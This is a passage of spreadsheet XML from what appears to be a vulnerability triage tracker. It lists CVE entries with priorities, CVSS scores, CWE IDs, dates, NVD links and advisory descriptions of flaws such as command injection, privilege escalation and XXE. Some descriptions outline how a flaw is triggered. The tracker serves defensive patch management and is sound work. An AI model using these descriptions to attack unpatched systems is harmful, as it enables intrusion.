          <t>An information leakage vulnerability was reported in the TCG TPM 2.0 reference code that could allow a local attacker with elevated privileges to obtain a credential from a TPM-aware CA for a falsified TPM key (such as an Attestation Key, DevID Key or TLS authentication key) and falsify other TPM 2.0 attestations with this key.  See also TCG VRT0010.</t>
        </is>
      </c>
      <c r="M1998" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6726</t>
        </is>
      </c>
    </row>
    <row r="1999">
      <c r="A1999" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1999" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82636</t>
        </is>
      </c>
      <c r="C1999" s="5" t="n">
        <v>7.9</v>
      </c>
      <c r="D1999" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1999" s="5" t="inlineStr"/>
      <c r="F1999" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1999" s="5" t="inlineStr"/>
      <c r="H1999" s="5" t="inlineStr"/>
      <c r="I1999" s="5" t="inlineStr">
        <is>
          <t>2026-08-30</t>
        </is>
      </c>
      <c r="J1999" s="5" t="inlineStr"/>
      <c r="K1999" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1999" s="5" t="inlineStr">
        <is>
          <t>Qubes OS before qubes-core-dom0-linux 4.3.22 allows OS command injection during a qvm-copy-to-vm call from dom0 to an attacker-controlled qube, because the "system" library function is used to process an error message that may have shell metacharacters. This occurs in core-admin-linux/file-copy-vm/qfile-dom0-agent.c.</t>
        </is>
      </c>
      <c r="M1999" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82636</t>
        </is>
      </c>
    </row>
    <row r="2000">
      <c r="A2000" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2000" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85649</t>
        </is>
      </c>
      <c r="C2000" s="5" t="n">
        <v>7.9</v>
      </c>
      <c r="D2000" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2000" s="5" t="inlineStr"/>
      <c r="F2000" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2000" s="5" t="inlineStr"/>
      <c r="H2000" s="5" t="inlineStr"/>
      <c r="I2000" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2000" s="5" t="inlineStr"/>
      <c r="K2000" s="5" t="inlineStr">
        <is>
          <t>CWE-252, CWE-636</t>
        </is>
      </c>
      <c r="L2000" s="5" t="inlineStr">
        <is>
          <t>(Holloway) Chew, Kean Ho's Actualizer v1.2.0 and earlier contains a fail-open password validation vulnerability in the Alpha user and root user password loops of Shell/debian-minbase-install.sh. The installer invokes mkpasswd to generate yescrypt password hashes but does not check the command's return value and unconditionally accepts the result. If mkpasswd fails to generate a yescrypt hash, for example because an incompatible mkpasswd implementation or an environment without yescrypt support is used, the resulting password hash variable can be empty and the build proceeds. The resulting image can therefore contain empty password fields for the root and alpha accounts, potentially permitting passwordless authentication depending on the authentication configuration.</t>
        </is>
      </c>
      <c r="M2000" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85649</t>
        </is>
      </c>
    </row>
    <row r="2001">
      <c r="A2001" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2001" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-48565</t>
        </is>
      </c>
      <c r="C2001" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2001" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2001" s="5" t="inlineStr"/>
      <c r="F2001" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2001" s="5" t="inlineStr"/>
      <c r="H2001" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="I2001" s="5" t="inlineStr">
        <is>
          <t>2025-12-08</t>
        </is>
      </c>
      <c r="J2001" s="5" t="inlineStr"/>
      <c r="K2001" s="5" t="inlineStr"/>
      <c r="L2001" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible way to bypass the cross profile intent filter due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2001" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-48565</t>
        </is>
      </c>
    </row>
    <row r="2002">
      <c r="A2002" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2002" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-48566</t>
        </is>
      </c>
      <c r="C2002" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2002" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2002" s="5" t="inlineStr"/>
      <c r="F2002" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2002" s="5" t="inlineStr"/>
      <c r="H2002" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="I2002" s="5" t="inlineStr">
        <is>
          <t>2025-12-08</t>
        </is>
      </c>
      <c r="J2002" s="5" t="inlineStr"/>
      <c r="K2002" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L2002" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible permission bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2002" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-48566</t>
        </is>
      </c>
    </row>
    <row r="2003">
      <c r="A2003" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2003" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-5914</t>
        </is>
      </c>
      <c r="C2003" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2003" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2003" s="5" t="inlineStr"/>
      <c r="F2003" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2003" s="5" t="inlineStr"/>
      <c r="H2003" s="5" t="inlineStr">
        <is>
          <t>libarchive:libarchive, redhat:enterprise_linux, redhat:openshift_container_platform</t>
        </is>
      </c>
      <c r="I2003" s="5" t="inlineStr">
        <is>
          <t>2025-06-09</t>
        </is>
      </c>
      <c r="J2003" s="5" t="inlineStr"/>
      <c r="K2003" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2003" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in the libarchive library, specifically within the archive_read_format_rar_seek_data() function. This flaw involves an integer overflow that can ultimately lead to a double-free condition. Exploiting a double-free vulnerability can result in memory corruption, enabling an attacker to execute arbitrary code or cause a denial-of-service condition.</t>
        </is>
      </c>
      <c r="M2003" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-5914</t>
        </is>
      </c>
    </row>
    <row r="2004">
      <c r="A2004" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2004" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-6020</t>
        </is>
      </c>
      <c r="C2004" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2004" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2004" s="5" t="inlineStr"/>
      <c r="F2004" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2004" s="5" t="inlineStr"/>
      <c r="H2004" s="5" t="inlineStr"/>
      <c r="I2004" s="5" t="inlineStr">
        <is>
          <t>2025-06-17</t>
        </is>
      </c>
      <c r="J2004" s="5" t="inlineStr"/>
      <c r="K2004" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2004" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in linux-pam. The module pam_namespace may use access user-controlled paths without proper protection, allowing local users to elevate their privileges to root via multiple symlink attacks and race conditions.</t>
        </is>
      </c>
      <c r="M2004" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-6020</t>
        </is>
      </c>
    </row>
    <row r="2005">
      <c r="A2005" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2005" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-61731</t>
        </is>
      </c>
      <c r="C2005" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2005" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2005" s="5" t="inlineStr"/>
      <c r="F2005" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2005" s="5" t="inlineStr"/>
      <c r="H2005" s="5" t="inlineStr">
        <is>
          <t>golang:go</t>
        </is>
      </c>
      <c r="I2005" s="5" t="inlineStr">
        <is>
          <t>2026-01-28</t>
        </is>
      </c>
      <c r="J2005" s="5" t="inlineStr"/>
      <c r="K2005" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L2005" s="5" t="inlineStr">
        <is>
          <t>Building a malicious file with cmd/go can cause can cause a write to an attacker-controlled file with partial control of the file content. The "#cgo pkg-config:" directive in a Go source file provides command-line arguments to provide to the Go pkg-config command. An attacker can provide a "--log-file" argument to this directive, causing pkg-config to write to an attacker-controlled location.</t>
        </is>
      </c>
      <c r="M2005" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-61731</t>
        </is>
      </c>
    </row>
    <row r="2006">
      <c r="A2006" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2006" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-7425</t>
        </is>
      </c>
      <c r="C2006" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2006" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2006" s="5" t="inlineStr"/>
      <c r="F2006" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2006" s="5" t="inlineStr"/>
      <c r="H2006" s="5" t="inlineStr"/>
      <c r="I2006" s="5" t="inlineStr">
        <is>
          <t>2025-07-10</t>
        </is>
      </c>
      <c r="J2006" s="5" t="inlineStr"/>
      <c r="K2006" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2006" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in libxslt where the attribute type, atype, flags are modified in a way that corrupts internal memory management. When XSLT functions, such as the key() process, result in tree fragments, this corruption prevents the proper cleanup of ID attributes. As a result, the system may access freed memory, causing crashes or enabling attackers to trigger heap corruption.</t>
        </is>
      </c>
      <c r="M2006" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-7425</t>
        </is>
      </c>
    </row>
    <row r="2007">
      <c r="A2007" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2007" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0065</t>
        </is>
      </c>
      <c r="C2007" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2007" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2007" s="5" t="inlineStr"/>
      <c r="F2007" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2007" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2007" s="5" t="inlineStr"/>
      <c r="I2007" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2007" s="5" t="inlineStr"/>
      <c r="K2007" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2007" s="5" t="inlineStr">
        <is>
          <t>In areBackgroundActivityStartsAllowed of BackgroundLaunchProcessController.java, there is a possible unintended way to launch activities in the background due to a logic error in the code. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2007" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0065</t>
        </is>
      </c>
    </row>
    <row r="2008">
      <c r="A2008" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2008" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0084</t>
        </is>
      </c>
      <c r="C2008" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2008" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2008" s="5" t="inlineStr"/>
      <c r="F2008" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2008" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2008" s="5" t="inlineStr"/>
      <c r="I2008" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2008" s="5" t="inlineStr"/>
      <c r="K2008" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2008" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of HostEmulationManager.java, there is a possible background activity launch due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2008" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0084</t>
        </is>
      </c>
    </row>
    <row r="2009">
      <c r="A2009" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2009" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11332</t>
        </is>
      </c>
      <c r="C2009" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2009" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2009" s="5" t="inlineStr"/>
      <c r="F2009" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2009" s="5" t="inlineStr"/>
      <c r="H2009" s="5" t="inlineStr"/>
      <c r="I2009" s="5" t="inlineStr">
        <is>
          <t>2026-06-05</t>
        </is>
      </c>
      <c r="J2009" s="5" t="inlineStr"/>
      <c r="K2009" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L2009" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in ansible-core. The ansible-galaxy role install command processes dependency specifications from a role's meta/requirements.yml file. Due to improper neutralization of argument delimiters, a malicious role author can inject arbitrary git configuration flags through the src field. This allows arbitrary code execution on the machine of a user who installs the role via ansible-galaxy role install.</t>
        </is>
      </c>
      <c r="M2009" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11332</t>
        </is>
      </c>
    </row>
    <row r="2010">
      <c r="A2010" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2010" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12410</t>
        </is>
      </c>
      <c r="C2010" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2010" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2010" s="5" t="inlineStr"/>
      <c r="F2010" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2010" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2010" s="5" t="inlineStr"/>
      <c r="I2010" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J2010" s="5" t="inlineStr"/>
      <c r="K2010" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L2010" s="5" t="inlineStr">
        <is>
          <t>Link following vulnerability in the Uninstaller component in CCleaner prior to 7.10.1464 on Windows allows a local, low-privileged attacker to escalate privileges to SYSTEM via a symlink/junction created during application uninstallation, which CCleaner follows when deleting the application's data folder with elevated integrity.</t>
        </is>
      </c>
      <c r="M2010" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12410</t>
        </is>
      </c>
    </row>
    <row r="2011">
      <c r="A2011" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2011" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15809</t>
        </is>
      </c>
      <c r="C2011" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2011" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2011" s="5" t="inlineStr"/>
      <c r="F2011" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2011" s="5" t="inlineStr"/>
      <c r="H2011" s="5" t="inlineStr"/>
      <c r="I2011" s="5" t="inlineStr">
        <is>
          <t>2026-07-15</t>
        </is>
      </c>
      <c r="J2011" s="5" t="inlineStr"/>
      <c r="K2011" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-134</t>
        </is>
      </c>
      <c r="L2011" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in CRI-O. The fix for a previous vulnerability (CVE-2022-4318) was incorrect, allowing it to be bypassed. An attacker capable of setting environment variables on a container can inject a newline character into the HOME environment variable. This issue allows the addition of arbitrary lines into /etc/passwd by use of a specially crafted environment variable.</t>
        </is>
      </c>
      <c r="M2011" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15809</t>
        </is>
      </c>
    </row>
    <row r="2012">
      <c r="A2012" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2012" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16826</t>
        </is>
      </c>
      <c r="C2012" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2012" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2012" s="5" t="inlineStr"/>
      <c r="F2012" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2012" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2012" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I2012" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2012" s="5" t="inlineStr"/>
      <c r="K2012" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2012" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a local attacker to execute arbitrary commands due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="M2012" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16826</t>
        </is>
      </c>
    </row>
    <row r="2013">
      <c r="A2013" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2013" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17499</t>
        </is>
      </c>
      <c r="C2013" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2013" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2013" s="5" t="inlineStr"/>
      <c r="F2013" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2013" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2013" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I2013" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2013" s="5" t="inlineStr"/>
      <c r="K2013" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2013" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a local attacker to execute arbitrary commands due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="M2013" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17499</t>
        </is>
      </c>
    </row>
    <row r="2014">
      <c r="A2014" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2014" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17523</t>
        </is>
      </c>
      <c r="C2014" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2014" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2014" s="5" t="inlineStr"/>
      <c r="F2014" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2014" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2014" s="5" t="inlineStr"/>
      <c r="I2014" s="5" t="inlineStr">
        <is>
          <t>2026-07-27</t>
        </is>
      </c>
      <c r="J2014" s="5" t="inlineStr"/>
      <c r="K2014" s="5" t="inlineStr"/>
      <c r="L2014" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
can: bcm: switch timer to HRTIMER_MODE_SOFT and remove hrtimer_tasklet
This patch switches the timer to HRTIMER_MODE_SOFT, which executed the
timer callback in softirq context and removes the hrtimer_tasklet.</t>
        </is>
      </c>
      <c r="M2014" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17523</t>
        </is>
      </c>
    </row>
    <row r="2015">
      <c r="A2015" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2015" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19820</t>
        </is>
      </c>
      <c r="C2015" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2015" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2015" s="5" t="inlineStr"/>
      <c r="F2015" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2015" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2015" s="5" t="inlineStr"/>
      <c r="I2015" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J2015" s="5" t="inlineStr"/>
      <c r="K2015" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L2015" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the Backblaze Client allows a local user to make the system not bootable by creating a link from Backblaze's folder to Windows OS system files during a backup. Successful exploitation requires an administrator-level system change that results in the absence of specific Windows OS security controls. This vulnerability is due to improper link resolution.</t>
        </is>
      </c>
      <c r="M2015" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19820</t>
        </is>
      </c>
    </row>
    <row r="2016">
      <c r="A2016" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2016" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-2050</t>
        </is>
      </c>
      <c r="C2016" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2016" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2016" s="5" t="inlineStr"/>
      <c r="F2016" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2016" s="5" t="inlineStr"/>
      <c r="H2016" s="5" t="inlineStr">
        <is>
          <t>gimp:gimp</t>
        </is>
      </c>
      <c r="I2016" s="5" t="inlineStr">
        <is>
          <t>2026-06-24</t>
        </is>
      </c>
      <c r="J2016" s="5" t="inlineStr"/>
      <c r="K2016" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-131</t>
        </is>
      </c>
      <c r="L2016" s="5" t="inlineStr">
        <is>
          <t>GIMP HDR File Parsing Heap-based Buffer Overflow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HDR files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28266.</t>
        </is>
      </c>
      <c r="M2016" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-2050</t>
        </is>
      </c>
    </row>
    <row r="2017">
      <c r="A2017" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2017" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-2310</t>
        </is>
      </c>
      <c r="C2017" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2017" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2017" s="5" t="inlineStr"/>
      <c r="F2017" s="5" t="inlineStr"/>
      <c r="G2017" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2017" s="5" t="inlineStr"/>
      <c r="I2017" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2017" s="5" t="inlineStr"/>
      <c r="K2017" s="5" t="inlineStr">
        <is>
          <t>CWE-91</t>
        </is>
      </c>
      <c r="L2017" s="5" t="inlineStr">
        <is>
          <t>IBM webMethods Integration Server 11.1 IBM webMethods Integration is vulnerable to an XML external entity injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources.</t>
        </is>
      </c>
      <c r="M2017" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-2310</t>
        </is>
      </c>
    </row>
    <row r="2018">
      <c r="A2018" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2018" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28572</t>
        </is>
      </c>
      <c r="C2018" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2018" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2018" s="5" t="inlineStr"/>
      <c r="F2018" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2018" s="5" t="inlineStr"/>
      <c r="H2018" s="5" t="inlineStr"/>
      <c r="I2018" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2018" s="5" t="inlineStr"/>
      <c r="K2018" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L2018" s="5" t="inlineStr">
        <is>
          <t>In onCreate of InstallLaunch.kt, there is a possible misleading UI due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2018" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28572</t>
        </is>
      </c>
    </row>
    <row r="2019">
      <c r="A2019" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2019" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28583</t>
        </is>
      </c>
      <c r="C2019" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2019" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2019" s="5" t="inlineStr"/>
      <c r="F2019" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2019" s="5" t="inlineStr"/>
      <c r="H2019" s="5" t="inlineStr"/>
      <c r="I2019" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2019" s="5" t="inlineStr"/>
      <c r="K2019" s="5" t="inlineStr">
        <is>
          <t>CWE-693, CWE-787</t>
        </is>
      </c>
      <c r="L2019" s="5" t="inlineStr">
        <is>
          <t>In validate_camera_metadata_structure of camera_metadata.c, there is a possible out of bounds write due to a logical error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2019" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28583</t>
        </is>
      </c>
    </row>
    <row r="2020">
      <c r="A2020" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2020" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28590</t>
        </is>
      </c>
      <c r="C2020" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2020" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2020" s="5" t="inlineStr"/>
      <c r="F2020" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2020" s="5" t="inlineStr"/>
      <c r="H2020" s="5" t="inlineStr"/>
      <c r="I2020" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2020" s="5" t="inlineStr"/>
      <c r="K2020" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L2020" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible improper encryption key validation due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2020" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28590</t>
        </is>
      </c>
    </row>
    <row r="2021">
